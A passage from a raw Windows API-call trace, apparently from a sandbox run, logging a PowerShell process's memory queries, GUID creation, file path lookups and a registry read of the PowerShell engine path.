VirtualQuery (in: lpAddress=0xeb1b0, lpBuffer=0xec070, dwLength=0x30 | out: lpBuffer=0xec070*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.537] VirtualQuery (in: lpAddress=0xeb240, lpBuffer=0xec100, dwLength=0x30 | out: lpBuffer=0xec100*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeb970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeb8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeb8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.538] VirtualQuery (in: lpAddress=0xeb1b0, lpBuffer=0xec070, dwLength=0x30 | out: lpBuffer=0xec070*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.538] VirtualQuery (in: lpAddress=0xeb240, lpBuffer=0xec100, dwLength=0x30 | out: lpBuffer=0xec100*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeb970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeb8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeb8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.538] VirtualQuery (in: lpAddress=0xeb1b0, lpBuffer=0xec070, dwLength=0x30 | out: lpBuffer=0xec070*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.538] VirtualQuery (in: lpAddress=0xeb240, lpBuffer=0xec100, dwLength=0x30 | out: lpBuffer=0xec100*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.539] VirtualQuery (in: lpAddress=0xeb1b0, lpBuffer=0xec070, dwLength=0x30 | out: lpBuffer=0xec070*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.539] VirtualQuery (in: lpAddress=0xeb240, lpBuffer=0xec100, dwLength=0x30 | out: lpBuffer=0xec100*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.539] VirtualQuery (in: lpAddress=0xeb1b0, lpBuffer=0xec070, dwLength=0x30 | out: lpBuffer=0xec070*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.539] VirtualQuery (in: lpAddress=0xeb240, lpBuffer=0xec100, dwLength=0x30 | out: lpBuffer=0xec100*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.539] VirtualQuery (in: lpAddress=0xeb1b0, lpBuffer=0xec070, dwLength=0x30 | out: lpBuffer=0xec070*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.539] VirtualQuery (in: lpAddress=0xeb240, lpBuffer=0xec100, dwLength=0x30 | out: lpBuffer=0xec100*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.539] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.540] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.540] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.540] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.540] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.540] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.540] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.540] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xd362aa54, Data2=0xfef5, Data3=0x4ce9, Data4=([0]=0x9e, [1]=0x4c, [2]=0x92, [3]=0x9b, [4]=0x5c, [5]=0x28, [6]=0x11, [7]=0xa1))) returned 0x0 [0085.540] VirtualQuery (in: lpAddress=0xebac0, lpBuffer=0xec980, dwLength=0x30 | out: lpBuffer=0xec980*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.541] VirtualQuery (in: lpAddress=0xebac0, lpBuffer=0xec980, dwLength=0x30 | out: lpBuffer=0xec980*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.541] VirtualQuery (in: lpAddress=0xebb50, lpBuffer=0xeca10, dwLength=0x30 | out: lpBuffer=0xeca10*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.541] VirtualQuery (in: lpAddress=0xebac0, lpBuffer=0xec980, dwLength=0x30 | out: lpBuffer=0xec980*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.541] VirtualQuery (in: lpAddress=0xebb50, lpBuffer=0xeca10, dwLength=0x30 | out: lpBuffer=0xeca10*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.541] VirtualQuery (in: lpAddress=0xebac0, lpBuffer=0xec980, dwLength=0x30 | out: lpBuffer=0xec980*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.541] VirtualQuery (in: lpAddress=0xebb50, lpBuffer=0xeca10, dwLength=0x30 | out: lpBuffer=0xeca10*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.541] VirtualQuery (in: lpAddress=0xebac0, lpBuffer=0xec980, dwLength=0x30 | out: lpBuffer=0xec980*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.542] VirtualQuery (in: lpAddress=0xebb50, lpBuffer=0xeca10, dwLength=0x30 | out: lpBuffer=0xeca10*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.542] VirtualQuery (in: lpAddress=0xebac0, lpBuffer=0xec980, dwLength=0x30 | out: lpBuffer=0xec980*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.542] VirtualQuery (in: lpAddress=0xebb50, lpBuffer=0xeca10, dwLength=0x30 | out: lpBuffer=0xeca10*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.542] VirtualQuery (in: lpAddress=0xebac0, lpBuffer=0xec980, dwLength=0x30 | out: lpBuffer=0xec980*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.542] VirtualQuery (in: lpAddress=0xebb50, lpBuffer=0xeca10, dwLength=0x30 | out: lpBuffer=0xeca10*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.542] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.542] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.543] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.543] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.543] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.543] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.543] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.543] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xa2c61653, Data2=0xd7d6, Data3=0x4498, Data4=([0]=0xa3, [1]=0x11, [2]=0x8a, [3]=0x25, [4]=0xd1, [5]=0x1a, [6]=0x9e, [7]=0xeb))) returned 0x0 [0085.544] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.544] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.544] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.544] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.544] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.544] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.545] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.545] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.545] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.545] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.545] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.545] VirtualQuery (in: lpAddress=0xeb780, lpBuffer=0xec640, dwLength=0x30 | out: lpBuffer=0xec640*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.545] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.546] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.546] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.546] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.546] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xad7257de, Data2=0x428a, Data3=0x4275, Data4=([0]=0xa2, [1]=0xe5, [2]=0x27, [3]=0x38, [4]=0x79, [5]=0xdd, [6]=0xc4, [7]=0xb0))) returned 0x0 [0085.546] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xcb5a040f, Data2=0x50ca, Data3=0x4347, Data4=([0]=0xb4, [1]=0x74, [2]=0xf6, [3]=0x3, [4]=0x21, [5]=0xa, [6]=0xdf, [7]=0x5f))) returned 0x0 [0085.546] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x5c694fd9, Data2=0x6714, Data3=0x4b45, Data4=([0]=0x93, [1]=0x10, [2]=0x9f, [3]=0x6f, [4]=0x9c, [5]=0x2f, [6]=0x3f, [7]=0xf9))) returned 0x0 [0085.546] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x9238f81f, Data2=0x97df, Data3=0x4278, Data4=([0]=0xb3, [1]=0xee, [2]=0x5c, [3]=0x9c, [4]=0xc1, [5]=0xc, [6]=0xbe, [7]=0xbe))) returned 0x0 [0085.547] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x59ec83a5, Data2=0x1b86, Data3=0x4192, Data4=([0]=0xb7, [1]=0x9c, [2]=0x79, [3]=0xb8, [4]=0x79, [5]=0x2b, [6]=0xd0, [7]=0xa2))) returned 0x0 [0085.547] VirtualQuery (in: lpAddress=0xeb890, lpBuffer=0xec750, dwLength=0x30 | out: lpBuffer=0xec750*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.547] VirtualQuery (in: lpAddress=0xeb920, lpBuffer=0xec7e0, dwLength=0x30 | out: lpBuffer=0xec7e0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.547] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x35257432, Data2=0xf23, Data3=0x4ddf, Data4=([0]=0xaa, [1]=0x86, [2]=0x3a, [3]=0x61, [4]=0x21, [5]=0xdb, [6]=0x36, [7]=0xa7))) returned 0x0 [0085.547] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xeb26e93e, Data2=0x702a, Data3=0x4627, Data4=([0]=0xa7, [1]=0xd4, [2]=0xa8, [3]=0xde, [4]=0x1f, [5]=0x6a, [6]=0xae, [7]=0xf2))) returned 0x0 [0085.547] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xd75943f5, Data2=0x43e, Data3=0x43ed, Data4=([0]=0x86, [1]=0x2d, [2]=0x25, [3]=0xd3, [4]=0xc1, [5]=0xfc, [6]=0xfc, [7]=0xa9))) returned 0x0 [0085.547] SetErrorMode (uMode=0x1) returned 0x1 [0085.547] SetErrorMode (uMode=0x1) returned 0x1 [0085.548] GetFileType (hFile=0x308) returned 0x1 [0085.548] ReadFile (in: hFile=0x308, lpBuffer=0x3859608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x3859608*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.551] SetErrorMode (uMode=0x1) returned 0x1 [0085.551] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed020 | out: lpFileInformation=0xed020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0085.551] SetErrorMode (uMode=0x1) returned 0x1 [0085.551] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed108 | out: phkResult=0xed108*=0x308) returned 0x0 [0085.551] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed08c, lpData=0x0, lpcbData=0xed088*=0x0 | out: lpType=0xed08c*=0x1, lpData=0x0, lpcbData=0xed088*=0x56) returned 0x0 [0085.551] CoTaskMemAlloc (cb=0x5a) returned 0x1b26d490 [0085.551] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed05c, lpData=0x1b26d490, lpcbData=0xed058*=0x56 | out: lpType=0xed05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed058*=0x56) returned 0x0 [0085.551] CoTaskMemFree (pv=0x1b26d490) [0085.551] RegCloseKey (hKey=0x308) returned 0x0 [0085.552] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xe58e901f, Data2=0xc23d, Data3=0x46de, Data4=([0]=0x86, [1]=0x35, [2]=0xbc, [3]=0x5d, [4]=0xc2, [5]=0xc5, [6]=0x4a, [7]=0xbe))) returned 0x0 [0085.553] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x541e199c, Data2=0xf7aa, Data3=0x40dc, Data4=([0]=0xa3, [1]=0x4f, [2]=0x21, [3]=0x5b, [4]=0x1, [5]=0xd, [6]=0x14, [7]=0xb4))) returned 0x0 [0085.553] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xcd515321, Data2=0x2d01, Data3=0x4d35, Data4=([0]=0xa3, [1]=0xef, [2]=0x80, [3]=0xc7, [4]=0x45, [5]=0x4f, [6]=0x12, [7]=0xc9))) returned 0x0 [0085.553] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x47ea136a, Data2=0x8bd1, Data3=0x45f0, Data4=([0]=0x92, [1]=0x27, [2]=0x7b, [3]=0x46, [4]=0xb8, [5]=0x19, [6]=0x9f, [7]=0xa3))) returned 0x0 [0085.553] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xc0a898d8, Data2=0x464, Data3=0x4e86, Data4=([0]=0xa0, [1]=0x63, [2]=0x4a, [3]=0xb7, [4]=0x56, [5]=0x28, [6]=0x5c, [7]=0xc9))) returned 0x0 [0085.553] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xccd58c1, Data2=0x404a, Data3=0x46ae, Data4=([0]=0x91, [1]=0xe0, [2]=0xcc, [3]=0xcd, [4]=0x5a, [5]=0xef, [6]=0xd0, [7]=0x7f))) returned 0x0 [0085.553] CoCreateGuid (in: pguid=0xed330 